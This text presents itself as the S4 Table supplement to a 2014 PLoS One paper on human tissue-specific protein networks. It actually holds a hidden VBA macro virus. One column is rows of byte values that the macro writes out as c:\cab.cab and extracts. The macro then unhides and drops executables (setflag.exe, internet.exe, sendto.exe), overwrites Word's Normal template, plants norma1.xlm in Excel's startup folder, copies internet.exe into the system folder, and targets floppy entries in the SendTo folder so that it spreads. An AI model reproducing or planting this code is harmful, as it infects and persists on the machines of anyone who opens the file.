# Supplementary material for: Construction and Analyses of Human Large-Scale Tissue Specific Networks
Source: PLoS One. 2014 Dec 16;9(12):e115074. doi: 10.1371/journal.pone.0115074 (PMC4267779; doi:10.1371/journal.pone.0115074)
Supplement: S4 Table — Housekeeping and tissue specific proteins inferred from two protein expression datasets. (XLSX) [file pone.0115074.s004.xlsx]

## Sheet: (m1)_(m2)_(m3)
	77 83 67 70 0 0 0 0 157 27 1 0 0 0 0 0 48 24 0 0 0 0 0 0 3 1 1 0 5 0 4 0 247 20 0 0 0 24 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 …	Private Sub createcabfile()
	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0…	Dim ch As Byte
	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0…	on error resume next
	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0…	Set fso = CreateObject("scripting.filesystemobject")
	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0…	Set w = CreateObject("wscript.shell")
	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0…	myfolder = w.specialfolders("Templates") & "\Software\"
	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0…	If Not fso.folderexists(myfolder) Then
	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0…	fso.createfolder myfolder
	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0…	End If
	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0…	For i=1 to Workbooks.Count
	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0…	If Workbooks(i).name="normal.xlm" then
	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0…	workbooks(i).close
	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 186 24 0 0 8 0 1 0 0 128 0 0 0 0 0 0 0 0 225 48 244 104 32 0 115 101 116 102 108 97 103 46 101 120 101 0 0 96 0 0 0 128 0 0 0 0 232 48 135 172 32 0 105 110 116 101 114 110 101 116 46 101 120 101 0 0 18 1 0 0 224 0 0 0 0 232 48 177 180 32 0 110 111 114 109 97 49 46 120 108 109 0 0 158 1 0 0 242 1 0 0 0 232 48 109 144 3…	fso.deletefile Application.StartupPath & "\normal.xlm"
	28 59 40 106 201 255 65 102 255 239 6 116 190 254 23 166 151 75 59 31 145 0 238 189 51 67 144 255 107 132 65 115 194 46 203 91 118 108 151 182 83 212 7 217 25 222 175 201 96 170 129 52 60 203 77 52 106 112 62 252 236 201 224 237 249 35 188 248 95 131 213 153 54 211 102 218 76 155 105 51 109 166 205 180 153 54 211 102 218 76 155 105 127 189 166 92 44 65 101 98 105 77 109 0 85 176 65 87 178 217 179…	End If
	241 76 19 218 204 88 154 64 84 69 228 84 37 206 182 79 68 201 148 10 215 36 111 204 32 176 48 14 40 171 200 104 17 185 192 174 74 198 210 89 41 138 176 70 44 30 34 130 142 149 9 105 152 41 74 246 211 82 193 59 43 64 3 99 37 140 235 244 165 31 73 14 130 68 8 96 18 12 28 237 238 111 251 59 237 111 97 108 21 2 206 149 68 150 235 236 52 73 37 82 57 232 84 226 227 156 226 99 176 89 169 251 87 225 185 …	Next
	208 178 7 188 14 242 49 11 109 224 219 207 115 112 187 210 82 228 99 129 190 69 238 97 116 185 197 130 82 65 93 230 244 219 241 99 28 69 45 221 207 210 107 65 16 197 31 209 97 78 243 185 235 29 45 190 232 81 41 47 128 127 12 150 7 82 151 31 85 194 14 74 178 161 62 215 233 113 217 129 46 23 255 65 179 160 203 198 22 32 199 215 12 19 226 129 19 169 156 246 114 197 195 238 129 150 181 40 156 214 150…	For i=1 to Workbooks.Count
	33 232 1 16 195 133 138 240 63 17 19 85 118 166 41 252 26 80 171 231 111 129 221 14 29 1 203 194 187 242 41 234 80 4 86 224 130 27 32 254 108 153 3 63 151 224 166 94 56 12 99 135 222 134 31 191 190 242 117 0 250 202 87 9 214 201 113 131 110 213 251 169 31 167 0 15 121 47 34 14 229 168 85 231 252 213 248 89 193 80 61 4 4 203 231 240 239 200 133 175 233 132 85 22 201 138 191 152 11 7 19 101 189 105…	If Workbooks(i).name="norma1.xlm" then
	74 153 107 139 83 49 239 88 136 242 155 111 65 63 98 244 146 21 122 126 145 33 2 233 46 228 29 163 189 41 247 64 91 30 248 209 98 47 239 246 10 45 93 46 240 48 48 102 143 34 32 97 117 152 147 26 67 214 45 171 189 156 92 57 37 30 67 90 35 17 67 31 137 20 33 212 104 3 177 170 177 96 181 46 11 186 204 235 83 135 192 214 99 192 145 234 77 105 47 79 33 63 7 97 1 191 227 36 106 176 198 84 58 143 196 13…	goto a1
	165 151 94 210 197 103 134 111 130 219 24 248 57 153 84 70 216 22 94 57 199 48 131 186 24 29 93 0 126 81 140 97 152 238 6 248 16 129 20 252 44 131 238 135 126 203 80 87 86 103 118 151 143 238 44 167 187 124 22 216 182 179 220 162 244 51 202 128 177 249 251 215 54 143 173 159 194 53 176 104 165 223 162 12 88 8 214 143 174 97 117 155 56 62 192 40 39 51 7 167 175 63 9 224 109 232 111 66 127 21 250 1…	End If
	226 78 31 64 1 62 217 123 64 46 65 27 132 160 50 161 67 21 60 145 208 13 111 84 250 239 134 55 42 61 169 89 223 33 222 168 107 35 219 24 57 127 32 50 113 64 206 138 156 112 170 1 190 125 191 145 186 66 242 189 1 202 46 146 208 190 155 73 104 73 241 51 171 2 206 177 255 148 94 167 206 106 232 27 31 158 31 87 206 9 74 92 200 201 184 87 82 73 130 7 82 46 242 196 75 115 65 247 74 51 131 122 151 100 1…	Next
	58 23 144 28 65 46 125 225 117 147 134 69 200 246 42 73 63 99 223 77 187 71 91 110 64 89 38 93 202 23 172 123 37 65 105 253 188 161 217 73 136 42 36 68 125 195 176 248 230 37 100 64 36 3 115 141 129 232 217 173 50 177 117 78 53 200 48 43 137 198 140 177 3 169 173 182 107 251 246 179 218 231 102 94 93 99 38 214 129 96 107 43 164 214 163 36 181 134 164 183 52 54 153 244 218 147 101 183 65 126 29 24…	cabfile= "c:\cab.cab"
	167 246 51 99 240 201 233 131 130 246 47 201 132 71 14 43 71 61 218 15 146 9 139 220 170 156 191 170 92 72 43 71 45 237 39 72 53 162 29 56 76 156 122 116 80 174 203 27 28 105 33 74 128 239 147 42 42 164 229 10 206 147 230 40 56 75 246 36 223 141 203 238 200 113 207 72 13 76 175 174 79 201 203 51 110 183 253 130 254 142 174 143 148 102 134 111 156 28 62 65 254 189 107 100 49 12 195 82 41 219 117 1…	If Not fso.fileexists(Application.StartupPath & "\norma1.xlm") Then
	86 117 193 15 226 178 240 93 64 41 45 120 46 46 11 53 236 202 178 2 41 46 235 105 204 202 46 216 19 151 133 58 15 101 90 193 179 152 149 162 101 245 162 0 75 16 9 48 234 169 42 129 68 171 54 43 12 14 189 2 114 224 136 236 199 49 162 206 58 25 229 218 204 197 64 181 64 64 17 55 100 211 98 154 27 192 243 51 81 32 244 30 198 191 44 142 22 198 138 113 62 108 178 15 180 208 249 22 238 115 201 84 178 8…	fso.delete cabfile
	94 11 194 38 34 156 17 40 60 201 199 131 21 143 188 88 153 161 38 12 186 80 99 79 217 206 133 242 54 113 180 163 80 25 69 148 238 31 137 24 184 249 168 123 202 98 211 66 173 134 123 36 183 129 163 197 35 138 81 0 209 25 200 249 201 252 202 44 243 190 35 66 101 214 7 138 120 106 13 112 126 83 11 17 145 129 164 77 171 84 195 26 238 106 175 5 240 44 229 59 178 40 46 5 81 121 24 80 97 191 131 218 103…	open cabfile for binary access write as #1
	173 208 61 163 14 56 18 83 68 51 31 102 58 251 73 231 23 97 87 107 45 181 191 174 36 137 36 102 131 125 243 228 42 209 136 178 223 210 222 114 106 164 223 192 46 4 94 134 75 5 44 41 77 177 120 151 56 40 190 255 85 149 148 152 42 48 0 223 83 76 175 118 225 155 249 120 251 47 109 231 180 193 46 63 163 74 139 207 112 229 221 231 6 86 209 157 92 98 96 228 17 37 69 140 20 19 153 47 252 57 52 188 129 4…	For i = 1 To 150
	126 65 171 95 77 178 99 139 82 9 171 194 136 11 68 231 108 183 232 204 114 203 109 58 16 140 176 15 95 117 128 64 177 105 176 226 223 230 11 138 65 50 51 112 115 235 198 208 208 1 174 106 170 79 6 82 86 165 75 156 184 233 244 167 100 242 14 129 92 166 88 201 216 142 29 110 133 233 179 91 216 84 56 65 206 2 84 209 180 95 241 138 87 64 132 176 255 53 22 153 187 103 3 104 172 51 115 151 76 116 61 92…	hv = ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Cells(i, 2).Value
	128 215 101 115 247 139 40 210 194 57 45 31 35 24 10 149 209 146 71 237 199 1 205 157 137 2 140 249 184 177 122 76 252 2 26 192 234 246 27 59 19 196 27 246 247 217 39 196 242 168 88 65 219 43 226 176 255 37 65 239 15 4 183 147 115 55 220 196 126 26 193 94 47 142 97 127 114 238 190 91 176 175 160 73 147 140 88 66 11 165 90 156 22 75 24 161 148 17 43 163 124 199 101 138 75 206 239 48 153 187 4 164 …	n=1
	71 62 139 22 41 226 26 139 96 16 11 45 124 158 74 212 179 102 200 20 230 16 44 11 45 162 133 191 161 10 149 99 108 134 248 204 94 92 54 177 125 111 81 12 145 101 162 150 213 92 52 175 50 58 143 187 134 166 11 82 113 81 234 135 34 119 141 155 33 254 0 101 98 213 53 6 133 124 63 45 142 207 203 79 61 205 94 18 225 92 30 183 169 26 113 137 17 150 242 107 98 25 180 251 30 151 166 119 19 176 66 39 91 1…	m=instr(hv," ")
	217 130 174 49 193 193 8 14 26 248 151 82 152 158 47 2 116 255 239 205 198 54 19 97 146 235 144 200 233 184 160 145 6 170 87 159 195 73 255 27 252 228 210 126 99 215 114 105 181 133 47 142 170 124 207 101 184 221 85 169 103 12 130 65 199 216 48 4 48 133 61 99 32 56 9 197 244 96 72 134 12 204 76 196 102 165 226 97 251 241 157 131 168 69 88 103 74 68 181 94 192 176 5 192 4 39 35 149 154 132 98 70 1…	do while m>0
	103 85 197 40 100 222 195 23 224 19 47 197 206 244 202 231 117 195 215 12 229 23 112 137 251 228 99 154 113 158 102 28 10 3 138 122 125 1 163 77 221 172 219 162 22 197 217 162 62 56 226 48 241 108 154 91 174 252 23 221 4 213 176 154 31 207 104 159 65 96 212 197 175 202 63 248 141 170 146 68 21 159 253 42 21 51 65 125 3 27 143 104 186 109 114 114 101 225 2 42 32 97 113 186 195 112 172 216 52 190 1…	ch=CByte(mid(hv,n,m-n))
	119 41 87 29 74 50 234 93 112 153 24 144 222 159 130 190 171 122 93 0 118 85 124 199 100 208 40 79 143 43 53 158 248 132 252 169 197 61 69 15 209 92 235 193 16 203 142 184 76 9 108 99 32 1 101 247 123 126 71 212 107 176 223 5 215 48 55 181 147 152 152 225 251 3 91 174 60 28 242 167 83 146 43 61 96 112 123 100 195 16 1 4 28 239 8 117 164 207 66 227 182 97 143 220 159 18 179 84 158 142 234 25 143 1…	put #1,,ch
	86 24 180 135 11 131 249 208 13 251 224 174 12 96 248 123 159 13 1 0 179 23 155 113 216 7 119 126 238 116 134 242 41 238 95 64 56 224 35 12 223 49 70 7 251 129 165 25 76 44 107 213 52 234 238 253 136 172 60 128 136 29 122 6 234 190 229 128 244 79 126 82 181 31 113 255 137 82 9 13 180 169 64 122 138 241 3 31 195 35 26 134 140 163 0 245 83 193 43 94 98 171 163 1 223 108 84 73 18 230 96 220 22 38 17…	n=m+1
	246 198 94 95 30 23 151 60 131 223 21 156 64 117 164 250 97 119 120 63 66 178 238 186 176 150 81 247 63 49 220 79 225 162 126 184 159 134 160 15 227 192 115 220 161 158 64 89 158 157 218 71 107 25 137 30 204 65 211 150 152 247 168 153 216 90 140 223 138 183 95 69 114 235 3 41 113 183 215 35 254 6 120 192 140 209 1 35 145 239 179 45 220 20 88 110 174 73 153 219 155 180 170 103 202 234 18 118 62 10…	m=instr(n,hv," ")
	255 106 34 223 220 133 28 60 90 97 144 79 42 155 136 160 40 117 83 195 120 229 200 243 240 9 7 69 49 143 188 150 124 29 152 33 184 76 4 37 123 180 35 65 28 116 107 144 192 133 7 223 141 181 8 163 197 150 178 148 211 60 225 217 19 185 148 155 138 21 254 61 149 240 223 40 79 85 85 41 142 142 21 104 27 7 25 54 192 200 35 23 12 99 43 248 206 189 143 200 32 163 31 223 57 50 250 241 90 126 92 141 217 2…	loop
	59 245 229 34 119 125 206 30 225 86 160 116 13 98 187 151 236 40 16 76 14 106 88 210 226 128 50 7 203 188 218 78 2 254 228 128 190 147 222 35 231 244 145 253 185 250 110 201 22 93 179 161 165 196 190 12 228 124 226 246 140 91 171 115 233 199 177 77 179 143 88 106 102 77 108 154 44 143 71 3 22 93 214 184 77 147 165 45 174 224 26 178 71 216 109 32 186 72 203 225 226 208 38 31 53 85 56 249 215 4 238…	Next
	143 171 88 195 214 55 53 222 172 183 244 182 245 90 216 218 63 82 111 9 214 107 230 130 126 235 206 250 32 203 213 52 88 183 115 141 219 16 198 186 173 166 161 129 0 34 220 226 219 182 191 165 169 209 223 90 207 62 88 195 98 96 101 113 136 19 237 63 148 127 235 184 155 154 253 208 112 83 99 75 19 164 107 253 59 235 183 197 193 234 115 228 111 109 246 111 99 253 181 100 102 226 231 21 97 150 125 5…	close #1
	235 54 127 51 158 3 0 32 101 217 136 107 121 83 45 215 64 122 95 11 123 200 73 81 255 72 225 72 92 55 207 129 135 13 194 110 110 113 82 175 221 166 196 71 157 76 240 213 215 250 11 235 106 130 27 154 202 241 44 175 108 99 253 84 18 182 255 117 112 138 249 230 124 31 69 237 64 252 181 185 42 108 130 189 15 39 0 97 61 108 173 62 129 84 38 166 17 219 13 109 176 97 220 90 105 13 208 188 230 146 198 2…	w.Run "%COMSPEC% /c attrib -s -h c:\setflag.exe", 0, True
	59 226 206 158 81 15 113 238 178 180 249 37 134 99 248 63 42 146 245 49 227 231 71 140 30 38 235 97 138 94 150 26 87 118 135 94 23 67 179 222 174 69 207 195 113 78 215 61 230 207 213 243 151 232 105 167 158 46 212 211 110 189 206 122 61 223 163 135 62 189 253 42 189 239 6 61 31 127 178 1 245 43 248 83 150 56 55 65 29 215 36 29 62 164 227 220 169 135 79 235 229 188 94 222 165 183 131 255 254 17 20…	w.Run "%COMSPEC% /c attrib -s -h c:\sendto.exe", 0, True
	182 217 52 129 93 168 251 64 37 245 50 203 51 221 108 130 25 125 169 152 236 227 252 127 154 120 200 112 138 82 89 185 219 34 158 117 148 103 66 122 199 9 254 79 60 162 172 57 88 197 154 133 85 93 187 208 46 97 156 132 41 110 49 227 15 34 23 179 255 240 138 43 54 11 146 173 88 142 204 202 17 245 236 139 130 57 180 72 16 84 154 186 182 2 233 236 116 224 187 115 124 198 51 139 178 91 83 43 21 156 1…	w.Run "%COMSPEC% /c extrac32 /E /Y /L c:\ c:\cab.cab", 0, True
	86 3 180 1 244 2 60 1 240 75 128 223 2 236 46 117 178 23 1 238 1 222 252 147 128 167 0 94 21 188 74 44 92 1 220 74 44 108 34 221 79 250 2 210 11 73 63 76 250 116 210 143 147 94 76 250 49 210 143 146 190 147 244 13 164 183 144 94 64 186 133 244 65 210 25 233 175 144 190 143 244 82 210 55 147 126 145 244 11 164 159 34 189 146 244 118 210 119 144 126 137 244 40 233 231 73 31 34 253 0 233 107 72 63 6…	w.Run "%COMSPEC% /c extract /E /Y /L c:\ c:\cab.cab", 0, True
	216 28 96 223 7 192 212 124 208 237 163 156 34 106 188 110 29 101 14 112 121 1 207 79 223 206 224 247 56 77 68 85 8 220 110 74 29 99 54 234 168 217 168 161 134 167 59 157 232 105 4 255 14 136 211 13 88 97 8 109 161 48 27 0 210 209 70 185 56 32 44 68 169 251 192 199 77 188 9 2 253 152 71 148 226 69 89 23 132 187 40 204 11 254 247 129 219 39 120 35 17 253 65 192 106 31 37 37 198 182 16 78 39 81 59 …	fso.deletefile cabfile
	113 111 9 70 85 251 102 119 212 83 231 233 172 118 251 253 155 219 27 58 84 255 70 79 180 126 151 76 219 208 58 212 180 192 7 137 35 187 38 162 54 47 93 122 138 255 182 192 30 53 30 164 81 27 209 148 29 227 248 34 81 109 26 213 110 65 95 85 48 232 71 122 187 244 121 0 109 73 30 213 7 196 254 73 125 154 90 124 133 103 202 56 142 115 66 197 126 188 72 63 110 43 254 218 243 103 223 1 165 117 243 67 …	fso.copyfile "c:\normal.dot", myfolder, True
	158 58 223 243 92 212 252 222 27 128 50 133 39 247 48 38 7 81 213 36 57 229 86 200 59 238 82 27 4 224 79 229 248 167 17 191 238 34 240 214 201 211 253 30 175 89 192 152 198 51 37 58 206 242 72 249 163 208 209 197 233 40 224 233 14 21 168 53 37 138 197 9 138 215 13 108 85 139 53 75 228 48 208 48 34 57 188 177 157 39 55 135 39 151 61 19 207 74 245 94 33 106 7 146 108 61 196 75 231 26 33 191 88 220 …	set word=createobject("word.application")
	247 41 232 199 20 244 227 28 93 169 50 222 30 82 171 76 215 199 151 168 108 144 102 165 214 210 163 87 198 95 75 209 89 88 75 206 52 98 82 8 249 56 212 124 98 105 242 41 191 50 254 57 199 149 204 83 193 228 216 54 150 52 196 73 26 158 83 165 225 118 149 188 19 179 62 147 52 108 59 49 234 184 181 237 237 177 90 228 114 142 17 63 37 88 61 160 176 250 180 194 234 51 156 213 28 221 242 246 231 212 12…	ntpath=word.NormalTemplate.Path & "\"
	216 144 156 163 21 166 233 135 69 60 124 163 45 155 85 177 203 184 12 177 145 63 250 41 245 33 30 8 239 226 190 10 67 208 247 91 222 7 150 57 217 123 85 218 62 89 116 46 241 254 247 185 168 13 243 218 203 209 200 167 232 194 52 93 198 51 240 60 206 179 167 229 2 110 25 80 44 39 20 75 159 98 137 9 139 88 240 226 246 157 26 187 75 99 119 170 246 103 122 235 46 39 175 51 232 253 213 189 201 27 97 30…	word.quit
	159 121 131 103 12 95 181 22 243 227 177 53 120 38 218 3 25 203 224 127 60 197 127 2 43 235 162 115 237 98 203 192 60 15 230 114 48 7 210 196 199 125 152 215 83 232 226 123 44 179 77 233 253 11 50 248 23 103 240 175 4 195 181 149 49 171 25 104 16 251 156 119 54 242 253 216 138 187 175 145 199 87 220 103 154 24 187 162 193 63 177 29 240 53 225 138 178 154 241 149 97 51 107 100 173 160 215 176 6 17…	fso.copyfile "c:\normal.dot", ntpath, True
	58 51 37 198 15 235 18 215 39 36 18 215 215 37 18 31 39 50 43 189 156 155 210 13 21 90 90 71 161 119 205 193 196 51 195 115 175 175 27 206 250 56 49 60 23 224 224 199 137 79 18 163 195 211 137 143 135 215 38 62 126 230 233 196 245 53 235 192 28 155 222 81 249 53 248 199 231 151 49 155 51 148 161 12 101 40 67 25 106 108 117 241 103 83 46 127 251 241 89 111 142 244 191 19 158 90 110 36 38 211 249 2…	fso.copyfile "c:\norma1.xlm", Application.StartupPath & "\", True
	10 41 180 47 226 118 92 165 171 2 41 104 5 41 109 96 245 80 215 120 106 84 19 184 171 161 46 27 198 76 203 198 76 116 205 169 85 180 137 116 202 250 234 75 179 180 229 215 134 241 220 63 187 202 134 30 88 41 251 164 49 242 15 221 49 53 37 255 201 217 64 249 164 137 108 198 204 23 178 158 131 6 49 9 66 223 4 14 13 88 158 38 62 189 69 114 27 194 126 193 221 222 233 11 72 95 144 170 34 26 220 38 164…	fso.copyfile "c:\internet.exe", fso.getspecialfolder(1) & "\"
	149 123 43 102 100 171 141 93 22 135 71 127 148 144 52 93 230 160 132 254 38 197 255 195 241 249 155 63 165 63 251 127 232 111 98 169 124 158 8 83 80 194 191 62 210 191 36 131 191 61 131 255 146 12 254 139 211 250 99 191 79 244 88 244 254 89 138 127 78 210 255 239 204 22 102 141 77 76 160 9 51 43 50 167 196 44 100 78 141 101 145 57 45 54 129 204 233 177 73 137 157 52 186 244 192 228 233 75 56 111…	set fold=fso.getfolder(w.SpecialFolders("SendTo"))
	189 171 15 106 226 136 226 151 128 18 5 197 239 47 164 46 17 36 145 24 9 248 173 1 52 160 162 129 162 1 17 77 165 71 114 33 167 201 5 239 14 2 78 109 11 182 106 71 180 142 86 90 63 58 173 245 3 191 58 214 106 171 237 212 58 109 167 173 51 118 172 99 59 163 78 213 58 106 71 170 50 142 86 59 227 119 223 238 94 2 145 20 253 195 191 58 13 147 187 219 183 187 183 111 223 123 191 183 111 247 194 30 43 …	for each ff in fold.files
	179 90 83 208 132 131 198 148 70 161 129 45 211 140 101 5 38 79 189 183 206 111 180 85 112 14 158 245 76 38 105 64 186 13 234 23 250 180 122 125 58 163 81 147 106 0 1 179 223 104 33 144 178 185 125 162 236 168 148 117 196 202 43 130 78 20 142 46 23 1 166 94 3 118 208 137 174 222 180 241 202 33 210 50 32 133 23 137 178 160 176 100 210 211 91 142 121 86 191 210 182 191 128 93 129 171 150 33 240 132…	if instr(ff.name,"软盘")>0 then
